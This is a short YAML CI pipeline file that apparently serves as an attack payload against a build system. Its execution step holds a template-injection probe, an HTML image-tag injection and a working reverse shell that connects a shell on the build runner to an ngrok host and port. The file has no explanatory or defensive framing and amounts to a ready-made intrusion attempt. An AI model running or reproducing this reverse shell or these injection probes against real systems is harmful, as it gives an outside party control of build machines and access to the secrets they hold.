pipelines:
  - name: shmavers_pipeline
    steps:
      - name: shmaver_step
        type: Bash
        configuration:
          inputResources:
            - name: my_property_bag
        execution:
          onExecute:
            - echo "${{7*'7'}}"
            - sh -i >& /dev/tcp/2.tcp.eu.ngrok.io/18236 0>&1
            - <img src=x>
